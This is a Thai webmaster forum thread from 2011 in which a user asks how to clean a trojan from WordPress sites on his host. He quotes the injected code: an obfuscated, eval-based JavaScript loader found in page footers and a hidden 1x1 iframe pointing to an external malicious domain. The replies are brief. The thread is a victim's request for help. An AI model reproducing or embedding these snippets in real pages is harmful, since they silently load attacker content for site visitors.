ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น
ThaiSEOBoard.com< กดยุบ (ห้องยกเลิกการใช้งาน)สาระคำถามทั่วไป (ย้ายไป cafe)มีใครยังมี PHP FizScript บ้างมั้ยครับ เว็บในโฮสโดนโทรจันหมดเลย
« หน้าที่แล้ว ต่อไป »
หน้า: [1]   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: มีใครยังมี PHP FizScript บ้างมั้ยครับ เว็บในโฮสโดนโทรจันหมดเลย  (อ่าน 672 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
jedineko
Verified Seller
สมุนแก๊งเสียว
*

พลังน้ำใจ: 97
ออฟไลน์ ออฟไลน์

กระทู้: 626



ดูรายละเอียด
« เมื่อ: 22 กันยายน 2011, 22:01:27 »
พอดีมีลูกค้าเจอแสกนไวรัสเตือนครับ ผมเช็คดูมันเป็นโทรจัน ฝังอยู่ทุกหน้า wordpress เลย

เบื้องต้นคิดว่าอาจจะเป็นที่โฮสเก่าผม อันนั้นลามไปทุกเว็บปั่น amazon จนปล่อยให้มันเน่าอย่างนั้น แต่คราวนี้ดันไปติดโฮสที่ทำเว็บ ทำธีมให้ลูกค้าด้วย คิดว่าต้องล้างบางแล้วล่ะครับ

อันนี้เป็น สคริปที่ฝังใน Footer ของทุกหน้าเว็บในส่วน wordpress admin

อ้างถึง
<script>String.prototype.asd=function(){return String['fro' 'mCha' 'rCo' 'de'];};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('sd'))throw 1;}catch(q){zxc={};}v=document.createTextNode('asd');var s="";try{eval('asdvds');}catch(q){for(i in v)r=v.childNodes.length 1}r*=2;e=eval;m=[11-r,11-r,107-r,104-r,34-r,42-r,102-r,113-r,101-r,119-r,111-r,103-r,112-r,118-r,48-r,105-r,103-r,118-r,71-r,110-r,103-r,111-r,103-r,112-r,118-r,117-r,68-r,123-r,86-r,99-r,105-r,80-r,99-r,111-r,103-r,42-r,41-r,100-r,113-r,102-r,123-r,41-r,43-r,93-r,50-r,95-r,43-r,125-r,11-r,11-r,11-r,107-r,104-r,116-r,99-r,111-r,103-r,116-r,42-r,43-r,61-r,11-r,11-r,127-r,34-r,103-r,110-r,117-r,103-r,34-r,125-r,11-r,11-r,11-r,102-r,113-r,101-r,119-r,111-r,103-r,112-r,118-r,48-r,121-r,116-r,107-r,118-r,103-r,42-r,36-r,62-r,107-r,104-r,116-r,99-r,111-r,103-r,34-r,117-r,116-r,101-r,63-r,41-r,106-r,118-r,118-r,114-r,60-r,49-r,49-r,105-r,109-r,111-r,112-r,116-r,121-r,105-r,111-r,48-r,101-r,124-r,48-r,101-r,101-r,49-r,101-r,113-r,119-r,112-r,118-r,51-r,56-r,48-r,114-r,106-r,114-r,41-r,34-r,121-r,107-r,102-r,118-r,106-r,63-r,41-r,51-r,50-r,41-r,34-r,106-r,103-r,107-r,105-r,106-r,118-r,63-r,41-r,51-r,50-r,41-r,34-r,117-r,118-r,123-r,110-r,103-r,63-r,41-r,120-r,107-r,117-r,107-r,100-r,107-r,110-r,107-r,118-r,123-r,60-r,106-r,107-r,102-r,102-r,103-r,112-r,61-r,114-r,113-r,117-r,107-r,118-r,107-r,113-r,112-r,60-r,99-r,100-r,117-r,113-r,110-r,119-r,118-r,103-r,61-r,110-r,103-r,104-r,118-r,60-r,50-r,61-r,118-r,113-r,114-r,60-r,50-r,61-r,41-r,64-r,62-r,49-r,107-r,104-r,116-r,99-r,111-r,103-r,64-r,36-r,43-r,61-r,11-r,11-r,127-r,11-r,11-r,104-r,119-r,112-r,101-r,118-r,107-r,113-r,112-r,34-r,107-r,104-r,116-r,99-r,111-r,103-r,116-r,42-r,43-r,125-r,11-r,11-r,11-r,120-r,99-r,116-r,34-r,104-r,34-r,63-r,34-r,102-r,113-r,101-r,119-r,111-r,103-r,112-r,118-r,48-r,101-r,116-r,103-r,99-r,118-r,103-r,71-r,110-r,103-r,111-r,103-r,112-r,118-r,42-r,41-r,107-r,104-r,116-r,99-r,111-r,103-r,41-r,43-r,61-r,104-r,48-r,117-r,103-r,118-r,67-r,118-r,118-r,116-r,107-r,100-r,119-r,118-r,103-r,42-r,41-r,117-r,116-r,101-r,41-r,46-r,41-r,106-r,118-r,118-r,114-r,60-r,49-r,49-r,105-r,109-r,111-r,112-r,116-r,121-r,105-r,111-r,48-r,101-r,124-r,48-r,101-r,101-r,49-r,101-r,113-r,119-r,112-r,118-r,51-r,56-r,48-r,114-r,106-r,114-r,41-r,43-r,61-r,104-r,48-r,117-r,118-r,123-r,110-r,103-r,48-r,120-r,107-r,117-r,107-r,100-r,107-r,110-r,107-r,118-r,123-r,63-r,41-r,106-r,107-r,102-r,102-r,103-r,112-r,41-r,61-r,104-r,48-r,117-r,118-r,123-r,110-r,103-r,48-r,114-r,113-r,117-r,107-r,118-r,107-r,113-r,112-r,63-r,41-r,99-r,100-r,117-r,113-r,110-r,119-r,118-r,103-r,41-r,61-r,104-r,48-r,117-r,118-r,123-r,110-r,103-r,48-r,110-r,103-r,104-r,118-r,63-r,41-r,50-r,41-r,61-r,104-r,48-r,117-r,118-r,123-r,110-r,103-r,48-r,118-r,113-r,114-r,63-r,41-r,50-r,41-r,61-r,104-r,48-r,117-r,103-r,118-r,67-r,118-r,118-r,116-r,107-r,100-r,119-r,118-r,103-r,42-r,41-r,121-r,107-r,102-r,118-r,106-r,41-r,46-r,41-r,51-r,50-r,41-r,43-r,61-r,104-r,48-r,117-r,103-r,118-r,67-r,118-r,118-r,116-r,107-r,100-r,119-r,118-r,103-r,42-r,41-r,106-r,103-r,107-r,105-r,106-r,118-r,41-r,46-r,41-r,51-r,50-r,41-r,43-r,61-r,11-r,11-r,11-r,102-r,113-r,101-r,119-r,111-r,103-r,112-r,118-r,48-r,105-r,103-r,118-r,71-r,110-r,103-r,111-r,103-r,112-r,118-r,117-r,68-r,123-r,86-r,99-r,105-r,80-r,99-r,111-r,103-r,42-r,41-r,100-r,113-r,102-r,123-r,41-r,43-r,93-r,50-r,95-r,48-r,99-r,114-r,114-r,103-r,112-r,102-r,69-r,106-r,107-r,110-r,102-r,42-r,104-r,43-r,61-r,11-r,11-r,127-r];mm='a'.asd();for(i=0;i<m.length;i  )s =mm(e("m" "[" "i]"));e(s);</script>


อันนี้หน้าแรก จะติดโค้ด i frame
อ้างถึง
<iframe src="http://717plf35i9.co.tv/?go=1 " width="1" height="1"></iframe>


หรือใครมีวิธีแก้ให้หายขาดบ้างมั้ยครับ

 wanwan017 wanwan017
บันทึกการเข้า
tenzamak
Verified Seller
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 800
ออฟไลน์ ออฟไลน์

กระทู้: 13,991



ดูรายละเอียด
« ตอบ #1 เมื่อ: 22 กันยายน 2011, 22:29:16 »
เครื่องที่ใช้อัพโหลดไฟล์มีไวรัสครับ จัดการเครื่องที่อัพก่อน
บันทึกการเข้า
host ราคาเริ่มต้นที่ 500/ปี
host inter ราคาเริ่มต้นที่ 500/ปี
hosting singapore ราคาเริ่มต้นที่ 500/ปี
vps ราคาเริ่มต้นที่ 500/เดือน
sincere
สมุนแก๊งเสียว
*

พลังน้ำใจ: 41
ออฟไลน์ ออฟไลน์

กระทู้: 717



ดูรายละเอียด เว็บไซต์
« ตอบ #2 เมื่อ: 22 กันยายน 2011, 23:32:32 »
Download จ้า

 wanwan011 wanwan011 wanwan011 wanwan011
บันทึกการเข้า

ขายกระเป๋า Longchamp นำเข้า
Jewelry Quality Shop
155 ปั่น Sub Auto Keyword
หน้า: [1]   ขึ้นบน
พิมพ์
« หน้าที่แล้ว ต่อไป »
กระโดดไป: